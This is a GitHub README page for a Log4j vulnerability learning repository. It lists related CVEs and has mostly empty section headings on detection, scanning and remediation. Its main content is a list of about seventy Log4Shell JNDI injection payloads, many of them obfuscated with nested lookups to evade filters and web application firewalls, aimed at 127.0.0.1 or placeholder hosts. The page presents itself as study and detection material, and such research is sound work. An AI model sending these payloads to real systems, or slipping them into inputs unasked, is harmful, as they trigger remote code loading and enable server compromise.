Skip to content

《HackLog4j-永恒之恶龙》致敬全宇宙最无敌的Java日志库!Tribute to the most invincible Java logging library in the universe!

Notifications You must be signed in to change notification settings

HackJava/Log4j2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

44 Commits
 
 
 
 

Repository files navigation

HackLog4j-永恒之恶龙

本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2022年12月27日。作者:0e0w

00-Log4j永恒恶龙

01-Log4j基础知识

02-Log4j框架识别

  • 待更新

03-Log4j上层建筑

log4j + ? = rce !

04-Log4j漏洞汇总

  • CVE-2021-45105
  • CVE-2021-44228
  • CVE-2021-4104
  • CVE-2019-17571
  • CVE-2017-5645

05-Log4j检测利用

如何判断一个网站是否存在Log4j JNDI注入漏洞?如何查找内网中存在Log4j JNDI注入漏洞?

一、Payload

${jndi:ldap://127.0.0.1/poc}
${jndi:rmi://127.0.0.1/poc}
${jndi:dns://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
$%7Bjndi:ldap://127.0.0.1/poc%7D
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}
${${::-j}ndi:rmi://k123.k123.k123/ass}
${jndi:rmi://k8.k123.k123}
${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}
${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}
j${loWer:Nd}i${uPper::}
${jndi:ldaps://127.0.0.1/poc}
${jndi:iiop://127.0.0.1/poc}
${date:ldap://127.0.0.1/poc}
${java:ldap://127.0.0.1/poc}
${marker:ldap://127.0.0.1/poc}
${ctx:ldap://127.0.0.1/poc}
${lower:ldap://127.0.0.1/poc}
${upper:ldap://127.0.0.1/poc}
${main:ldap://127.0.0.1/poc}
${jvmrunargs:ldap://127.0.0.1/poc}
${sys:ldap://127.0.0.1/poc}
${env:ldap://127.0.0.1/poc}
${log4j:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
${jndi:rmi://127.0.0.1}/
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
${jndi:dns://127.0.0.1}
${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
${jnd${upper:i}:ldap://127.0.0.1/poc}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${lower:jndi}:${lower:ldap}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:ldap}://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:ldap://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:rmi://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:ldap://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:rmi://127.0.0.1/poc}
${${::::::::::::::-j}ndi:ldap://127.0.0.1/poc}
${${::::::::::::::-j}ndi:rmi://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}

二、源码检测

三、出网检测

四、不出网检测

五、主动扫描

六、被动扫描

七、Header检测

八、请求参数检测

九、其他工具

06-Log4j漏洞修复

07-Log4j分析文章

08-Log4j靶场环境

Stargazers over time

About

《HackLog4j-永恒之恶龙》致敬全宇宙最无敌的Java日志库!Tribute to the most invincible Java logging library in the universe!

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published